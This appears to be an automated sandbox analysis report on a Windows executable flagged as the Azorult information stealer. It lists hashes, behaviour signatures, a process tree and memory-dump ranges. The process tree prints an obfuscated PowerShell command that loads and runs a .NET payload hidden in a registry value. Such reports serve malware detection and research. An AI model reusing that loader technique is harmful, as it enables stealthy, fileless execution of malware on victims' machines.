Analysis

  • max time kernel
    149s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    05-06-2024 14:33

General

  • Target

    d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe

  • Size

    219KB

  • MD5

    8816d5e592685626fbbfdb1b1b309d79

  • SHA1

    650de5fc16a287c7801742ec92a2cc1ae7fcf4e8

  • SHA256

    d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

  • SHA512

    323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f

  • SSDEEP

    3072:8OJNjggfyKg0KggLV0FOhJirBwtHwwEJx5Ehl/Qs7GzrlKFHZWazC3ayZyn+q/wD:5H10CtAbe

Malware Config

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{bf8dbb63-7a7c-45c5-9b12-380edf0de9cb}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:448
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:480
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
          • Suspicious use of UnmapMainImage
          • Suspicious use of WriteProcessMemory
          PID:592
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:320
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
              3⤵
                PID:1388
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:668
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Modifies security service
                PID:752
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:812
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1160
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                      PID:856
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {DDADB401-F6C1-4F73-B648-275608A54F4B} S-1-5-18:NT AUTHORITY\System:Service:
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3020
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1860
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:964
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:236
                        • C:\Windows\System32\spoolsv.exe
                          C:\Windows\System32\spoolsv.exe
                          2⤵
                            PID:352
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:1060
                            • C:\Windows\system32\taskhost.exe
                              "taskhost.exe"
                              2⤵
                                PID:1100
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                2⤵
                                  PID:2344
                                • C:\Windows\system32\sppsvc.exe
                                  C:\Windows\system32\sppsvc.exe
                                  2⤵
                                    PID:2352
                                • C:\Windows\system32\lsass.exe
                                  C:\Windows\system32\lsass.exe
                                  1⤵
                                    PID:488
                                  • C:\Windows\system32\lsm.exe
                                    C:\Windows\system32\lsm.exe
                                    1⤵
                                      PID:496
                                    • C:\Windows\Explorer.EXE
                                      C:\Windows\Explorer.EXE
                                      1⤵
                                        PID:1192
                                        • C:\Users\Admin\AppData\Local\Temp\d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
                                          "C:\Users\Admin\AppData\Local\Temp\d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe"
                                          2⤵
                                          • Loads dropped DLL
                                          • Adds Run key to start application
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:2180
                                          • C:\Users\Admin\AppData\Local\Temp\$77d347a0
                                            "C:\Users\Admin\AppData\Local\Temp\$77d347a0"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:1796
                                          • C:\Users\Admin\AppData\Local\Temp\$77fc2d36
                                            "C:\Users\Admin\AppData\Local\Temp\$77fc2d36"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:844
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "-984970092-1468701873-8320633882064582688-1648279742-1113695101933362385-1211163620"
                                        1⤵
                                          PID:2316

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • \Users\Admin\AppData\Local\Temp\$77d347a0

                                          Filesize

                                          219KB

                                          MD5

                                          8816d5e592685626fbbfdb1b1b309d79

                                          SHA1

                                          650de5fc16a287c7801742ec92a2cc1ae7fcf4e8

                                          SHA256

                                          d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

                                          SHA512

                                          323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f

                                        • memory/1796-4908-0x0000000000400000-0x000000000042B000-memory.dmp

                                          Filesize

                                          172KB

                                        • memory/1860-4910-0x0000000001630000-0x00000000016B0000-memory.dmp

                                          Filesize

                                          512KB

                                        • memory/1860-4911-0x0000000019F60000-0x000000001A242000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/1860-4912-0x0000000000A00000-0x0000000000A08000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/1860-5110-0x0000000001630000-0x00000000016B0000-memory.dmp

                                          Filesize

                                          512KB

                                        • memory/1860-4934-0x0000000001600000-0x000000000162A000-memory.dmp

                                          Filesize

                                          168KB

                                        • memory/2180-29-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-65-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-4-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-11-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-5-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-7-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-51-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-61-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-9-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-13-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-15-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-17-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-23-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-21-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-27-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-25-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-19-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-2-0x00000000746D0000-0x0000000074DBE000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2180-31-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-59-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-67-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-3-0x00000000075D0000-0x0000000007820000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-63-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-57-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-55-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-53-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-49-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-47-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-45-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-43-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-41-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-39-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-37-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-35-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-33-0x00000000075D0000-0x000000000781A000-memory.dmp

                                          Filesize

                                          2.3MB

                                        • memory/2180-4890-0x00000000746D0000-0x0000000074DBE000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2180-4892-0x00000000057C0000-0x000000000580C000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/2180-4891-0x00000000052E0000-0x000000000536C000-memory.dmp

                                          Filesize

                                          560KB

                                        • memory/2180-4909-0x00000000746DE000-0x00000000746DF000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2180-4913-0x0000000005860000-0x00000000058B4000-memory.dmp

                                          Filesize

                                          336KB

                                        • memory/2180-4933-0x00000000746D0000-0x0000000074DBE000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2180-1-0x0000000000090000-0x00000000000CC000-memory.dmp

                                          Filesize

                                          240KB

                                        • memory/2180-0-0x00000000746DE000-0x00000000746DF000-memory.dmp

                                          Filesize

                                          4KB